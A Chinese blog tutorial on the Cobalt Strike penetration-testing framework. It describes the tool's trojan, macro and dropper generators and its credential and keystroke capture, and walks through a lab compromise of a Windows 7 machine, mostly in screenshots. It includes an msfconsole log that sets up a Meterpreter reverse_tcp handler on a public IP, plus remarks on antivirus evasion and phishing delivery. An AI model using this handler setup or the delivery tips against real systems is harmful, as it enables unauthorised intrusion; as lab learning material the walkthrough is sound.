【Cobalt strike 渗透测试神器】

2023-11-05 09:10

本文主要是介绍【Cobalt strike 渗透测试神器】,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

一、前言

安装包下载

主机详情

二、部分模块和Payload介绍

三、基本使用步骤

1. 服务端和客户端

2. 设置监听

四、配合其他工具反弹shell

1.  kali中使用msf

2.  CS创建监听

3. metasploit使用exploit 模块


一、前言

     Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS。最近这个工具大火,成为了渗透测试中不可缺少的利器。其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名工具i并且在攻防测试团队协作方面堪称利器,因此广受黑客喜爱。Cobalt Strike分为客户端和服务端可分布式操作可以协同作战。但要想好玩的话,一定要架设在外网上

安装包下载

官网下载: ​​​​​https://www.cobaltstrike.com

博主资源免费下载:https://download.csdn.net/download/qq_55213436/85003580

主机详情

公网服务器:IP地址---:47.108.44.4       操作系统:Linux。

客户端:IP地址---:192.168.43.114        操作系统:Windows。

受害机:IP地址---:192.168. 175.146     操作系统:win7。

二、部分模块和Payload介绍

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

1-Cobalt Strike
New Connection 新建连接,支持连接多个服务器端
Preferences 设置Cobal Strike界面、控制台、以及输出报告样式、TeamServer连接记录
Visualization主要展示输出结果的视图
VPN Interfaces设置VPN接口
Listenrs  创建监听器
Script Manager脚本管理,可以通过AggressorScripts脚本来加强自身,可以扩展菜单栏,Beacon命令行,提权脚本
Close退出
2-View
Applications 显示受害主机的应用信息
Credentials  显示所有以获取的受害主机的凭证,如hashdump、Mimikatz
Downloads 查看已下载文件
Event Log 主机上线记录以及团队协作聊天记录
Keystrokes 查看键盘记录结果
Proxy Pivots  查看代理模块
Screenshots 查看所有屏幕截图
Script Console  加载第三方脚本以增强功能
Targets 显示所有受害主机

    

3-Package
HTML Application生成(executable/VBA/powershell)这三种原理实现的恶意HTA木马文件
MS Office Macro生成office宏病毒文件
Payload Generator生成各种语言版本的payload
USB/CD AutoPlay生成利用自动播放运行的木马文件
Windows Dropper  捆绑器能够对任意的正常文件进行捆绑
Windows Executable生成可执行exe木马
Windows Executable(Stageless生成无状态的可执行exe木马

                                      

4-Reporting
Activity Report 活动报告
Hosts Report 主机报告
Indicators of Compromise  IOC报告:包括C2配置文件的流量分析、域名、IP和上传文件的MD5 hashes
Sessions Report  会话报告
Social Engineering Report   社会工程报告:包括鱼叉钓鱼邮件及点击记录
Tactics, Techniques, and Procedures   战术技术及相关程序报告:包括行动对应的每种战术的检测策略和缓解策略
Reset Data   重置数据
Export Data  导出数据,导出.tsv文件格式

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

三、基本使用步骤

1. 服务端和客户端

启动服务端

进入到CS的安装目录下,执行如下的操作:
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

客户端上线,打开CS的Windows客户端程序,即cobaltstrike.exe,后输入如下信息:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

成功连接上公网的CS服务器
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

2. 设置监听

创建监听器:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

3. 创建payload 

创建payload,等待目标主机上线。在本次演示实验中,关闭所有的杀毒软件和firewall。在实际的攻击过程中,我们肯定是要对payload做“免杀”来规避杀毒软件的检测,具体的免杀操作和规避杀毒软件的监测后续会有相应的介绍。

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

 木马程序如下:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

运行对应的木马程序,则可以在CS的客户端返回对应的受害机的相关信息:

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

拿到主机的权限后就可以执行后渗透操作:
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

其实我们可以结合其他的方式来增加攻击的隐蔽性和跨时空性。如:结合伪造邮件、嵌入到隐蔽的文件中。

四、配合其他工具反弹shell

此处以CS配合metasploit实现反弹shell,达到能够使用metasploit的相应工具实现对目标主机的渗透操作。(效果很棒!)

1.  kali中使用msf

──(root💀kali)-[~]
└─# msfconsole______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|                                                       https://metasploit.com |
|______________________________________________________________________________|=[ metasploit v6.1.14-dev                          ]
+ -- --=[ 2180 exploits - 1155 auxiliary - 399 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 9 evasion                                       ]Metasploit tip: Metasploit can be configured at startup, see 
msfconsole --help to learn moremsf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show optionsModule options (exploit/multi/handler):Name  Current Setting  Required  Description----  ---------------  --------  -----------Payload options (windows/meterpreter/reverse_tcp):Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)LHOST                      yes       The listen address (an interface may be specified)LPORT     4444             yes       The listen portExploit target:Id  Name--  ----0   Wildcard Targetmsf6 exploit(multi/handler) > set lhost 47.108.217.53 
lhost => 47.108.217.53
msf6 exploit(multi/handler) > set lport 66
lport => 66
msf6 exploit(multi/handler) >  

2.  CS创建监听

    使用Cobalt Strike创建一个windows/foreign/reverse_tcp的Listener。其中ip为Metasploit的ip地址,端口为Metasploit所监听的端口。(在下这儿截错图啦:下面的第一张图中HOST的IP地址应该为kali的IP地址!!!)

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

然后选择我们之前创建的:Windows/foreign/reverse_http选项,点击choose。

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

3. metasploit使用exploit 模块

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA6Z-n6Zuo5LmL5byl,size_20,color_FFFFFF,t_70,g_se,x_16

使用命令:输入shell命令后 ,进入dos界面,输入命令:chcp 65001即可解除乱码。

至此CS配合metasploit就成功啦。我们可以使用metasplit上的工具进行愉快的玩耍啦。

  (CS还有很多非常棒的功能:如构建隧道等后期还应该加强对其学习和深入利用。)

这篇关于【Cobalt strike 渗透测试神器】的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


原文地址:https://blog.csdn.net/qq_55213436/article/details/123928344
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.chinasem.cn/article/348816

相关文章

使用Python进行GRPC和Dubbo协议的高级测试

《使用Python进行GRPC和Dubbo协议的高级测试》GRPC(GoogleRemoteProcedureCall)是一种高性能、开源的远程过程调用(RPC)框架,Dubbo是一种高性能的分布式服... 目录01 GRPC测试安装gRPC编写.proto文件实现服务02 Dubbo测试1. 安装Dubb

Python的端到端测试框架SeleniumBase使用解读

《Python的端到端测试框架SeleniumBase使用解读》:本文主要介绍Python的端到端测试框架SeleniumBase使用,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全... 目录SeleniumBase详细介绍及用法指南什么是 SeleniumBase?SeleniumBase

基于Python+PyQt5打造一个跨平台Emoji表情管理神器

《基于Python+PyQt5打造一个跨平台Emoji表情管理神器》在当今数字化社交时代,Emoji已成为全球通用的视觉语言,本文主要为大家详细介绍了如何使用Python和PyQt5开发一个功能全面的... 目录概述功能特性1. 全量Emoji集合2. 智能搜索系统3. 高效交互设计4. 现代化UI展示效果

python多线程并发测试过程

《python多线程并发测试过程》:本文主要介绍python多线程并发测试过程,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、并发与并行?二、同步与异步的概念?三、线程与进程的区别?需求1:多线程执行不同任务需求2:多线程执行相同任务总结一、并发与并行?1、

Python+PyQt5实现MySQL数据库备份神器

《Python+PyQt5实现MySQL数据库备份神器》在数据库管理工作中,定期备份是确保数据安全的重要措施,本文将介绍如何使用Python+PyQt5开发一个高颜值,多功能的MySQL数据库备份工具... 目录概述功能特性核心功能矩阵特色功能界面展示主界面设计动态效果演示使用教程环境准备操作流程代码深度解

Python+PyQt5开发一个Windows电脑启动项管理神器

《Python+PyQt5开发一个Windows电脑启动项管理神器》:本文主要介绍如何使用PyQt5开发一款颜值与功能并存的Windows启动项管理工具,不仅能查看/删除现有启动项,还能智能添加新... 目录开篇:为什么我们需要启动项管理工具功能全景图核心技术解析1. Windows注册表操作2. 启动文件

基于Python打造一个智能单词管理神器

《基于Python打造一个智能单词管理神器》这篇文章主要为大家详细介绍了如何使用Python打造一个智能单词管理神器,从查询到导出的一站式解决,感兴趣的小伙伴可以跟随小编一起学习一下... 目录1. 项目概述:为什么需要这个工具2. 环境搭建与快速入门2.1 环境要求2.2 首次运行配置3. 核心功能使用指

SpringBoot中整合RabbitMQ(测试+部署上线最新完整)的过程

《SpringBoot中整合RabbitMQ(测试+部署上线最新完整)的过程》本文详细介绍了如何在虚拟机和宝塔面板中安装RabbitMQ,并使用Java代码实现消息的发送和接收,通过异步通讯,可以优化... 目录一、RabbitMQ安装二、启动RabbitMQ三、javascript编写Java代码1、引入

Nginx设置连接超时并进行测试的方法步骤

《Nginx设置连接超时并进行测试的方法步骤》在高并发场景下,如果客户端与服务器的连接长时间未响应,会占用大量的系统资源,影响其他正常请求的处理效率,为了解决这个问题,可以通过设置Nginx的连接... 目录设置连接超时目的操作步骤测试连接超时测试方法:总结:设置连接超时目的设置客户端与服务器之间的连接

Ubuntu系统怎么安装Warp? 新一代AI 终端神器安装使用方法

《Ubuntu系统怎么安装Warp?新一代AI终端神器安装使用方法》Warp是一款使用Rust开发的现代化AI终端工具,该怎么再Ubuntu系统中安装使用呢?下面我们就来看看详细教程... Warp Terminal 是一款使用 Rust 开发的现代化「AI 终端」工具。最初它只支持 MACOS,但在 20